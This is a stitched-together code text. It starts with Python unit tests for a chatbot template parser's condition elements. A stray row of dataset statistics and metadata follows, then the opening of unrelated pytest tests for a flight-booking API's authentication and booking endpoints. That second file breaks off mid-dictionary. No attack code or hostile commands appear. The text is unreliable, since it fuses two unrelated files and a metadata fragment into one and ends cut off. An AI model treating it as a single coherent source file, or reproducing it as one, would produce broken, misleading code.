template = ET.fromstring("""
<template>
<condition bot="aname">
<li value="a">A</li>
<li value="b">B</li>
<li><value>c</value>C</li>
<lx>D</lx>
</condition>
</template>
""")
with self.assertRaises(Exception):
self._graph.parse_template_expression(template)
def test_condition_template_Single_invalid_type(self):
template = ET.fromstring("""
<template>
<condition bot="aname">
<li value="a">A</li>
<li value="b">B</li>
<li name="name1"><value>c</value>C</li>
<li>D</li>
</condition>
</template>
""")
with self.assertRaises(Exception):
self._graph.parse_template_expression(template)
##################################################################################################################
# Multiple (type3)
#
def test_condition_template_multi_typename_name_value_mixed(self):
template = ET.fromstring("""
<template>
<condition>
<li name='name1' value="a">Val1</li>
<li value="b"><name>name2</name>Val2</li>
<li name="name3"><value>c</value>Val3</li>
<li><name>name4</name><value>d</value>Val4</li>
<li>Val5</li>
</condition>
</template>
""")
ast = self._graph.parse_template_expression(template)
self.assertIsNotNone(ast)
self.assertIsInstance(ast, TemplateNode)
self.assertIsNotNone(ast.children)
template_node = ast.children[0]
self.assertIsNotNone(template_node)
self.assertIsInstance(template_node, TemplateConditionNode)
self.assertEqual(len(template_node.children), 5)
node = template_node.children[0]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.GLOBAL)
self.assertFalse(node.loop)
self.assertIsNotNone(node.name)
self.assertEqual(node.name.children[0].word, "name1")
self.assertIsNotNone(node.value)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "Val1")
node = template_node.children[1]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.GLOBAL)
self.assertFalse(node.loop)
self.assertIsNotNone(node.name)
self.assertEqual(node.name.children[0].word, "name2")
self.assertIsNotNone(node.value)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "Val2")
node = template_node.children[2]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.GLOBAL)
self.assertFalse(node.loop)
self.assertIsNotNone(node.name)
self.assertEqual(node.name.children[0].word, "name3")
self.assertIsNotNone(node.value)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "Val3")
node = template_node.children[3]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.GLOBAL)
self.assertFalse(node.loop)
self.assertEqual(node.name.children[0].word, "name4")
self.assertIsNotNone(node.value)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "Val4")
node = template_node.children[4]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.DEFAULT)
self.assertFalse(node.loop)
self.assertIsNone(node.name)
self.assertIsNone(node.value)
self.assertTrue(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "Val5")
def test_condition_template_multi_typename_name_value_mixed_loop(self):
template = ET.fromstring("""
<template>
<condition>
<li name='name1' value="a">Val1 <loop /></li>
<li value="b"><name>name2</name>Val2</li>
<li name="name3"><value>c</value>Val3</li>
<li><name>name4</name><value>d</value>Val4</li>
<li>Val5</li>
</condition>
</template>
""")
ast = self._graph.parse_template_expression(template)
self.assertIsNotNone(ast)
self.assertIsInstance(ast, TemplateNode)
self.assertIsNotNone(ast.children)
template_node = ast.children[0]
self.assertIsNotNone(template_node)
self.assertIsInstance(template_node, TemplateConditionNode)
self.assertEqual(len(template_node.children), 5)
node = template_node.children[0]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.GLOBAL)
self.assertTrue(node.loop)
self.assertIsNotNone(node.name)
self.assertEqual(node.name.children[0].word, "name1")
self.assertIsNotNone(node.value)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "Val1")
node = template_node.children[1]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.GLOBAL)
self.assertFalse(node.loop)
self.assertIsNotNone(node.name)
self.assertEqual(node.name.children[0].word, "name2")
self.assertIsNotNone(node.value)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "Val2")
node = template_node.children[2]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.GLOBAL)
self.assertFalse(node.loop)
self.assertIsNotNone(node.name)
self.assertEqual(node.name.children[0].word, "name3")
self.assertIsNotNone(node.value)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "Val3")
node = template_node.children[3]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.GLOBAL)
self.assertFalse(node.loop)
self.assertEqual(node.name.children[0].word, "name4")
self.assertIsNotNone(node.value)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "Val4")
node = template_node.children[4]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.DEFAULT)
self.assertFalse(node.loop)
self.assertIsNone(node.name)
self.assertIsNone(node.value)
self.assertTrue(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "Val5")
def test_condition_template_multi_typedata_name_value_mixed(self):
template = ET.fromstring("""
<template>
<condition>
<li data='name1' value="a">Val1</li>
<li value="b"><data>name2</data>Val2</li>
<li data="name3"><value>c</value>Val3</li>
<li><data>name4</data><value>d</value>Val4</li>
<li>Val5</li>
</condition>
</template>
""")
ast = self._graph.parse_template_expression(template)
self.assertIsNotNone(ast)
self.assertIsInstance(ast, TemplateNode)
self.assertIsNotNone(ast.children)
template_node = ast.children[0]
self.assertIsNotNone(template_node)
self.assertIsInstance(template_node, TemplateConditionNode)
self.assertEqual(len(template_node.children), 5)
node = template_node.children[0]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.DATA)
self.assertFalse(node.loop)
self.assertIsNotNone(node.name)
self.assertEqual(node.name.children[0].word, "name1")
self.assertIsNotNone(node.value)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "Val1")
node = template_node.children[1]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.DATA)
self.assertFalse(node.loop)
self.assertIsNotNone(node.name)
self.assertEqual(node.name.children[0].word, "name2")
self.assertIsNotNone(node.value)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "Val2")
node = template_node.children[2]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.DATA)
self.assertFalse(node.loop)
self.assertIsNotNone(node.name)
self.assertEqual(node.name.children[0].word, "name3")
self.assertIsNotNone(node.value)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "Val3")
node = template_node.children[3]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.DATA)
self.assertFalse(node.loop)
self.assertEqual(node.name.children[0].word, "name4")
self.assertIsNotNone(node.value)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "Val4")
node = template_node.children[4]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.DEFAULT)
self.assertFalse(node.loop)
self.assertIsNone(node.name)
self.assertIsNone(node.value)
self.assertTrue(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "Val5")
def test_condition_template_multi_typedata_name_value_mixed_loop(self):
template = ET.fromstring("""
<template>
<condition>
<li data='name1' value="a">Val1 <loop /></li>
<li value="b"><data>name2</data>Val2</li>
<li data="name3"><value>c</value>Val3</li>
<li><data>name4</data><value>d</value>Val4</li>
<li>Val5</li>
</condition>
</template>
""")
ast = self._graph.parse_template_expression(template)
self.assertIsNotNone(ast)
self.assertIsInstance(ast, TemplateNode)
self.assertIsNotNone(ast.children)
template_node = ast.children[0]
self.assertIsNotNone(template_node)
self.assertIsInstance(template_node, TemplateConditionNode)
self.assertEqual(len(template_node.children), 5)
node = template_node.children[0]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.DATA)
self.assertTrue(node.loop)
self.assertIsNotNone(node.name)
self.assertEqual(node.name.children[0].word, "name1")
self.assertIsNotNone(node.value)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "Val1")
node = template_node.children[1]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.DATA)
self.assertFalse(node.loop)
self.assertIsNotNone(node.name)
self.assertEqual(node.name.children[0].word, "name2")
self.assertIsNotNone(node.value)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "Val2")
node = template_node.children[2]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.DATA)
self.assertFalse(node.loop)
self.assertIsNotNone(node.name)
self.assertEqual(node.name.children[0].word, "name3")
self.assertIsNotNone(node.value)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "Val3")
node = template_node.children[3]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.DATA)
self.assertFalse(node.loop)
self.assertEqual(node.name.children[0].word, "name4")
self.assertIsNotNone(node.value)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "Val4")
node = template_node.children[4]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.DEFAULT)
self.assertFalse(node.loop)
self.assertIsNone(node.name)
self.assertIsNone(node.value)
self.assertTrue(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "Val5")
def test_condition_template_multi_typevar_name_value_mixed(self):
template = ET.fromstring("""
<template>
<condition>
<li var='name1' value="a">Val1</li>
<li value="b"><var>name2</var>Val2</li>
<li var="name3"><value>c</value>Val3</li>
<li><var>name4</var><value>d</value>Val4</li>
<li>Val5</li>
</condition>
</template>
""")
ast = self._graph.parse_template_expression(template)
self.assertIsNotNone(ast)
self.assertIsInstance(ast, TemplateNode)
self.assertIsNotNone(ast.children)
template_node = ast.children[0]
self.assertIsNotNone(template_node)
self.assertIsInstance(template_node, TemplateConditionNode)
self.assertEqual(len(template_node.children), 5)
node = template_node.children[0]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.LOCAL)
self.assertFalse(node.loop)
self.assertIsNotNone(node.name)
self.assertEqual(node.name.children[0].word, "name1")
self.assertIsNotNone(node.value)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "Val1")
node = template_node.children[1]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.LOCAL)
self.assertFalse(node.loop)
self.assertIsNotNone(node.name)
self.assertEqual(node.name.children[0].word, "name2")
self.assertIsNotNone(node.value)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "Val2")
node = template_node.children[2]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.LOCAL)
self.assertFalse(node.loop)
self.assertIsNotNone(node.name)
self.assertEqual(node.name.children[0].word, "name3")
self.assertIsNotNone(node.value)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "Val3")
node = template_node.children[3]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.LOCAL)
self.assertFalse(node.loop)
self.assertEqual(node.name.children[0].word, "name4")
self.assertIsNotNone(node.value)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "Val4")
node = template_node.children[4]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.DEFAULT)
self.assertFalse(node.loop)
self.assertIsNone(node.name)
self.assertIsNone(node.value)
self.assertTrue(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "Val5")
def test_condition_template_multi_typevar_name_value_mixed_loop(self):
template = ET.fromstring("""
<template>
<condition>
<li var='name1' value="a">Val1 <loop /></li>
<li value="b"><var>name2</var>Val2</li>
<li var="name3"><value>c</value>Val3</li>
<li><var>name4</var><value>d</value>Val4</li>
<li>Val5</li>
</condition>
</template>
""")
ast = self._graph.parse_template_expression(template)
self.assertIsNotNone(ast)
self.assertIsInstance(ast, TemplateNode)
self.assertIsNotNone(ast.children)
template_node = ast.children[0]
self.assertIsNotNone(template_node)
self.assertIsInstance(template_node, TemplateConditionNode)
self.assertEqual(len(template_node.children), 5)
node = template_node.children[0]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.LOCAL)
self.assertTrue(node.loop)
self.assertIsNotNone(node.name)
self.assertEqual(node.name.children[0].word, "name1")
self.assertIsNotNone(node.value)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "Val1")
node = template_node.children[1]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.LOCAL)
self.assertFalse(node.loop)
self.assertIsNotNone(node.name)
self.assertEqual(node.name.children[0].word, "name2")
self.assertIsNotNone(node.value)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "Val2")
node = template_node.children[2]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.LOCAL)
self.assertFalse(node.loop)
self.assertIsNotNone(node.name)
self.assertEqual(node.name.children[0].word, "name3")
self.assertIsNotNone(node.value)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "Val3")
node = template_node.children[3]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.LOCAL)
self.assertFalse(node.loop)
self.assertEqual(node.name.children[0].word, "name4")
self.assertIsNotNone(node.value)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "Val4")
node = template_node.children[4]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.DEFAULT)
self.assertFalse(node.loop)
self.assertIsNone(node.name)
self.assertIsNone(node.value)
self.assertTrue(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "Val5")
def test_condition_template_multi_bot_name_value_mixed(self):
template = ET.fromstring("""
<template>
<condition>
<li bot='name1' value="a">Val1</li>
<li value="b"><bot>name2</bot>Val2</li>
<li bot="name3"><value>c</value>Val3</li>
<li><bot>name4</bot><value>d</value>Val4</li>
<li>Val5</li>
</condition>
</template>
""")
ast = self._graph.parse_template_expression(template)
self.assertIsNotNone(ast)
self.assertIsInstance(ast, TemplateNode)
self.assertIsNotNone(ast.children)
template_node = ast.children[0]
self.assertIsNotNone(template_node)
self.assertIsInstance(template_node, TemplateConditionNode)
self.assertEqual(len(template_node.children), 5)
node = template_node.children[0]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.BOT)
self.assertFalse(node.loop)
self.assertIsNotNone(node.name)
self.assertEqual(node.name.children[0].word, "name1")
self.assertIsNotNone(node.value)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "Val1")
node = template_node.children[1]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.BOT)
self.assertFalse(node.loop)
self.assertIsNotNone(node.name)
self.assertEqual(node.name.children[0].word, "name2")
self.assertIsNotNone(node.value)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "Val2")
node = template_node.children[2]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.BOT)
self.assertFalse(node.loop)
self.assertIsNotNone(node.name)
self.assertEqual(node.name.children[0].word, "name3")
self.assertIsNotNone(node.value)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "Val3")
node = template_node.children[3]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.BOT)
self.assertFalse(node.loop)
self.assertEqual(node.name.children[0].word, "name4")
self.assertIsNotNone(node.value)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "Val4")
node = template_node.children[4]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.DEFAULT)
self.assertFalse(node.loop)
self.assertIsNone(node.name)
self.assertIsNone(node.value)
self.assertTrue(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "Val5")
def test_condition_template_multi_bot_name_value_mixed_loop(self):
template = ET.fromstring("""
<template>
<condition>
<li bot='name1' value="a">Val1 <loop /></li>
<li value="b"><bot>name2</bot>Val2</li>
<li bot="name3"><value>c</value>Val3</li>
<li><bot>name4</bot><value>d</value>Val4</li>
<li>Val5</li>
</condition>
</template>
""")
ast = self._graph.parse_template_expression(template)
self.assertIsNotNone(ast)
self.assertIsInstance(ast, TemplateNode)
self.assertIsNotNone(ast.children)
template_node = ast.children[0]
self.assertIsNotNone(template_node)
self.assertIsInstance(template_node, TemplateConditionNode)
self.assertEqual(len(template_node.children), 5)
node = template_node.children[0]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.BOT)
self.assertTrue(node.loop)
self.assertIsNotNone(node.name)
self.assertEqual(node.name.children[0].word, "name1")
self.assertIsNotNone(node.value)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "Val1")
node = template_node.children[1]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.BOT)
self.assertFalse(node.loop)
self.assertIsNotNone(node.name)
self.assertEqual(node.name.children[0].word, "name2")
self.assertIsNotNone(node.value)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "Val2")
node = template_node.children[2]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.BOT)
self.assertFalse(node.loop)
self.assertIsNotNone(node.name)
self.assertEqual(node.name.children[0].word, "name3")
self.assertIsNotNone(node.value)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "Val3")
node = template_node.children[3]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.BOT)
self.assertFalse(node.loop)
self.assertEqual(node.name.children[0].word, "name4")
self.assertIsNotNone(node.value)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "Val4")
node = template_node.children[4]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.DEFAULT)
self.assertFalse(node.loop)
self.assertIsNone(node.name)
self.assertIsNone(node.value)
self.assertTrue(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "Val5")
def test_condition_template_multi_type(self):
template = ET.fromstring("""
<template>
<condition>
<li name='name1' value="a">Val1 <loop /></li>
<li value="b"><data>name2</data>Val2</li>
<li var="name3"><value>c</value>Val3</li>
<li><bot>name4</bot><value>d</value>Val4</li>
<li>Val5</li>
</condition>
</template>
""")
ast = self._graph.parse_template_expression(template)
self.assertIsNotNone(ast)
self.assertIsInstance(ast, TemplateNode)
self.assertIsNotNone(ast.children)
template_node = ast.children[0]
self.assertIsNotNone(template_node)
self.assertIsInstance(template_node, TemplateConditionNode)
self.assertEqual(len(template_node.children), 5)
node = template_node.children[0]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.GLOBAL)
self.assertTrue(node.loop)
self.assertIsNotNone(node.name)
self.assertEqual(node.name.children[0].word, "name1")
self.assertIsNotNone(node.value)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "Val1")
node = template_node.children[1]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.DATA)
self.assertFalse(node.loop)
self.assertIsNotNone(node.name)
self.assertEqual(node.name.children[0].word, "name2")
self.assertIsNotNone(node.value)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "Val2")
node = template_node.children[2]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.LOCAL)
self.assertFalse(node.loop)
self.assertIsNotNone(node.name)
self.assertEqual(node.name.children[0].word, "name3")
self.assertIsNotNone(node.value)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "Val3")
node = template_node.children[3]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.BOT)
self.assertFalse(node.loop)
self.assertEqual(node.name.children[0].word, "name4")
self.assertIsNotNone(node.value)
self.assertIsInstance(node.value, TemplateNode)
self.assertFalse(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "Val4")
node = template_node.children[4]
self.assertIsInstance(node, TemplateConditionListItemNode)
self.assertEqual(node.var_type, TemplateConditionVariable.DEFAULT)
self.assertFalse(node.loop)
self.assertIsNone(node.name)
self.assertIsNone(node.value)
self.assertTrue(node.is_default())
self.assertEqual(len(node.children), 1)
self.assertEqual(node.children[0].resolve(self._client_context), "Val5")
def test_condition_template_Multi_type_duplicate(self):
template = ET.fromstring("""
<template>
<condition>
<li name='name1' value="a" var="name">Val1 <loop /></li>
<li value="b"><bot>name2</bot>Val2</li>
<li bot="name3"><value>c</value>Val3</li>
<li><bot>name4</bot><value>d</value>Val4</li>
<li>Val5</li>
</condition>
</template>
""")
with self.assertRaises(Exception):
self._graph.parse_template_expression(template)
def test_condition_template_invalid_tag(self):
template = ET.fromstring("""
<template>
<condition>
<li name="name" value="a">Val1 <loop /></li>
<li value="b"><bot>name2</bot>Val2</li>
<li bot="name3"><value>c</value>Val3</li>
<li><bot>name4</bot><value>d</value>Val4</li>
<lx>Val5</lx>
</condition>
</template>
""")
with self.assertRaises(Exception):
self._graph.parse_template_expression(template)
def test_condition_template_default_with_value(self):
template = ET.fromstring("""
<template>
<condition>
<li name="name" value="a">Val1 <loop /></li>
<li value="a">Val5</li>
</condition>
</template>
""")
with self.assertRaises(Exception):
self._graph.parse_template_expression(template)
def test_condition_template_not_default_no_value(self):
template = ET.fromstring("""
<template>
<condition>
<li name="name">Val1 <loop /></li>
<li>Val5</li>
</condition>
</template>
""")
with self.assertRaises(Exception):
self._graph.parse_template_expression(template)
| 43.641218
| 126
| 0.643962
| 8,743
| 87,457
| 6.307675
| 0.022075
| 0.102814
| 0.070973
| 0.07246
| 0.974559
| 0.973544
| 0.971586
| 0.96805
| 0.962229
| 0.961159
| 0
| 0.008844
| 0.242382
| 87,457
| 2,003
| 127
| 43.663005
| 0.823465
| 0.012681
| 0
| 0.942037
| 0
| 0
| 0.174037
| 0.02356
| 0
| 0
| 0
| 0
| 0.592572
| 1
| 0.0287
| false
| 0
| 0.003376
| 0
| 0.032639
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
fa8ffadcf9eda821cdd6de82931e87253502e6dc
| 7,309
|
py
|
Python
|
tests/test_flight_ticket/test_get_flight_bookings.py
|
otseobande/flight-booker
|
5dce0efeb4f32553f9e33f88925189ec4f8e45d4
|
[
"Apache-2.0"
] | 2
|
2019-06-26T13:58:55.000Z
|
2019-07-07T09:28:40.000Z
|
tests/test_flight_ticket/test_get_flight_bookings.py
|
otseobande/flight-booker
|
5dce0efeb4f32553f9e33f88925189ec4f8e45d4
|
[
"Apache-2.0"
] | 12
|
2019-06-25T23:31:08.000Z
|
2021-05-06T19:37:34.000Z
|
tests/test_flight_ticket/test_get_flight_bookings.py
|
otseobande/flight-booker
|
5dce0efeb4f32553f9e33f88925189ec4f8e45d4
|
[
"Apache-2.0"
] | null | null | null |
import json, datetime
from api.models.user import User
from api.models.flight import Flight
from api.models.flight_ticket import FlightTicket
def test_it_return_401_if_authorization_header_is_not_passed(client):
response = client.get(
'/v1/flights/asdfasfasd/bookings',
data=json.dumps({})
)
response_body = json.loads(response.data)
assert response.status_code == 401
assert response_body == {
'status': 'error',
'message': 'Token not provided or is invalid.'
}
def test_it_should_return_404_if_flight_id_is_invalid(client):
user = User(
full_name='John Ade',
phone_number='(324) 324 4234',
address='1, afsfad, asdfasf.',
email='johnade@gmail.com',
password='password'
)
user.save()
token = user.generate_token()
response = client.get(
'/v1/flights/asdfasfasd/bookings',
data=json.dumps({}),
headers={
'Authorization': 'Bearer ' + token
}
)
response_body = json.loads(response.data)
assert response.status_code == 404
assert response_body == {
'status': 'error',
'message': 'Flight not found.'
}
def test_it_should_return_404_if_flight_is_not_found(client):
user = User(
full_name='John Ade',
phone_number='(324) 324 4234',
address='1, afsfad, asdfasf.',
email='johnade@gmail.com',
password='password'
)
user.save()
token = user.generate_token()
response = client.get(
'/v1/flights/{}/bookings'.format(str(user.id)),
headers={
'Authorization': 'Bearer ' + token
}
)
response_body = json.loads(response.data)
assert response.status_code == 404
assert response_body == {
'status': 'error',
'message': 'Flight not found.'
}
def test_it_should_return_error_if_date_is_invalid(client):
user = User(
full_name='John Ade',
phone_number='(324) 324 4234',
address='1, afsfad, asdfasf.',
email='johnade@gmail.com',
password='password'
)
user.save()
token = user.generate_token()
flight = Flight(**{
'estimated_arrival_time': '2014-12-22T03:12:58.019077+00:00',
'airline': 'Arik',
'departure_time': '2014-12-22T03:12:58.019077+00:00',
'fare': 50000,
'max_capacity': 1,
'destination': 'Enugu',
'origin': 'Calabar'
})
flight.save()
response = client.get(
'/v1/flights/{}/bookings?date=2012'.format(str(flight.id)),
headers={
'Authorization': 'Bearer ' + token
}
)
response_body = json.loads(response.data)
assert response.status_code == 400
assert response_body == {
'status': 'error',
'message': 'Date should be in YYYY-MM-DD format'
}
def test_it_should_return_flight_bookings_successfully_if_date_is_passed(client):
user = User(
full_name='John Ade',
phone_number='(324) 324 4234',
address='1, afsfad, asdfasf.',
email='johnade@gmail.com',
password='password'
)
user.save()
token = user.generate_token()
flight = Flight(**{
'estimated_arrival_time': '2014-12-22T03:12:58.019077+00:00',
'airline': 'Arik',
